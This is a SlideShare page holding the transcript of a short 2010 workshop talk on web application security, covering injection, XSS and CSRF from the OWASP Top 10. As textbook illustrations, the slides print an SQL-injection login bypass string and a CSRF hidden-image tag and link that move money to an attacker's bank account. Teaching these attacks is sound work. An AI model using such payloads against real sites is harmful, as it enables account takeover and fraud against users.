Your SlideShare is downloading. ×
0
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Is the Web at Risk?
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Is the Web at Risk?

2,671

Published on

A very short presentation held at the WIP2 workshop in Lisbon. This presentation talks about the security trends on the new WWW.

A very short presentation held at the WIP2 workshop in Lisbon. This presentation talks about the security trends on the new WWW.

Published in: Technology
1 Comment
0 Likes
Statistics
Notes
  • Be the first to like this

No Downloads
Views
Total Views
2,671
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
44
Comments
1
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. is the web @ risk ? World Internet Project Meeting 2010 ISCTE-IUL/SoTA/ADETTI-IUL Carlos Serrão Instituto Superior de Ciências do Trabalho e da Empresa carlos.serrao@iscte.pt Instituto Universitário de Lisboa carlos.j.serrao@gmail.com School of Technology and Architecture ADETTI-IUL http://www.carlosserrao.net http://blog.carlosserrao.net http://www.linkedin.com/in/carlosserrao
  • 2. Is the Web … … at risk? … a risk? … putting YOU at risk? WHY? HOW? WHEN?
  • 3. The Internet… … and the WWW, in the beg inning .
  • 4. in the beginning... Vinton Gray Cerf Robert Elliot Kahn … a.k.a. the “Internet fathers”
  • 5. The Internet was created… … as an ubiquitous … decentralized … standardized … global … interconnected … digital … communications channel.
  • 6. in the beginning... (Sir) Tim Berners Lee … a.k.a. the “WWW father”
  • 7. The WWW was created! A system of interlinked hypertext documents accessed via the Internet. Infinite worldwide knowledge access.
  • 8. growth
  • 9. evolving, growing network Small data part on Large amounts of Data on the Cloud a specific web-site data on a large (or limited number number of sites Applications on the of web-sites) Applications on the Web and Cloud desktop and Web Applications on the (more and more) Data almost desktop Part of the data inexistent on the Most data is on the still on desktop desktop (still on desktop (but also mobile) mobile) Data processing on Data processing on Data processing the desktop the desktop, but almost inexistent also on the web user
  • 10. evolving, growing network Small data part on Large amounts of Data on the Cloud a specific web-site data on a large (or limited number number of sites Applications on the of web-sites) Applications on the Web and Cloud desktop and Web Applications on the (more and more) Data almost desktop Part of the data inexistent on the Most data is on the still on desktop desktop (still on desktop (but also mobile) mobile) Data processing on Data processing on Data processing the desktop the desktop, but almost inexistent also on the web user
  • 11. evolving, growing network Small data part on Large amounts of Data on the Cloud a specific web-site data on a large (or limited number number of sites Applications on the of web-sites) Applications on the Web and Cloud desktop and Web Applications on the (more and more) Data almost desktop Part of the data inexistent on the Most data is on the still on desktop desktop (still on desktop (but also mobile) mobile) Data processing on Data processing on Data processing the desktop the desktop, but almost inexistent also on the web user
  • 12. security++   what do we have today?   anti-virus   anti-malware   anti-spyware   firewalls   intrusion detection systems   …   are they enough?
  • 13. security++   YES, but…   dothey protect the user from the web applications?   cana Web application be compromised to hurt legitimate users?   sure it can.
  • 14. security++   How?   Do you trust your favorite web-applications?   Google   Gmail   Doyou trust your favorite social-web applications?   Facebook   Twitter   Do you trust your homebanking?   Do you trust your government web-sites?
  • 15. security++ The security perimeter has huge security holes in the application Application Layer layer Legacy Systems Human Resrcs Web Services Directories Custom Developed Databases Application Code Billing APPLICATION ATTACK App Server Web Server Network Layer Hardened OS Firewall Firewall
  • 16. implications…
  • 17. security trends problem types typical problems on web apps
  • 18. the security risks http://www.owasp.org/index.php/Top_10
  • 19. security risks   considering the three most important   A1: Injection   A2: Cross Site Scripting (XSS)   A5: Cross Site Request Forgery (CSRF)
  • 20. A1: Injection what if?
  • 21. A1: Injection what if? SELECT * FROM users usr WHERE usr.username = ‘admin’;--’ AND usr.password=’bb21158c733229347bd4e681891e213d94c685be’
  • 22. A1: Injection what if?
  • 23. any input from the web app user can be an attack vector
  • 24. A2: Cross Site Scripting (XSS)   injecting malicious payload on the web app from the end-user side to be redirected to other users (victims)
  • 25. A2: Cross Site Scripting (XSS) 1 Attacker sets the trap – update my profile Application with stored XSS Attacker enters a vulnerability malicious script into a web page that stores the data on the server Knowledge Mgmt Communication Administration Bus. Functions E-Commerce Transactions 2 Victim views page – sees attacker profile Accounts Finance Custom Code Script runs inside victim’s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim’s session cookie
  • 26. A5: Cross Site Request Forgery (CSRF)   an attacker can build its own malicious website and initiate request on the user’s browser
  • 27. A5: Cross Site Request Forgery (CSRF) Attacker sets the trap on some website on the internet 1 (or simply via an e-mail) Application with CSRF Hidden <img> tag vulnerability contains attack against vulnerable site Knowledge Mgmt Communication Administration Bus. Functions Transactions E-Commerce Accounts Finance While logged into vulnerable site, 2 victim views attacker site Custom Code 3 Vulnerable site sees <img> tag loaded by legitimate request browser – sends GET from victim and request (including performs the action credentials) to requested vulnerable site
  • 28. A5: Cross Site Request Forgery (CSRF) Alice transfer 100€ to Bob Bob through bank.com POST http://bank.com/transfer.do HTTP/1.1 ... ... ... Content-Length: 19; acct=BOB&amount=100 realizes that the same bank.com web application can execute Pirate the transfer using a URL with parameters GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1 will try to use Alice to transfer 100.000€ to its own account http://bank.com/transfer.do?acct=MARIA&amount=100000 sends an HTML email to Alice with an URL to click <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a> or, sends an HTML email to Alice with a image to hide the attack <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0"> Alice if Alice is authenticated at bank.com with an active session the transfer is performed
  • 29. consequences This is serious!!! And we are just looking at the tip of the iceberg!
  • 30. [quick] conclusions   Extra-care with the web applications you trust your data   Extra-care on the way you handle your email   Always act suspicious upon something “strange” on the web   WebApp developers take care on what you do – your code is part of the security perimeter

×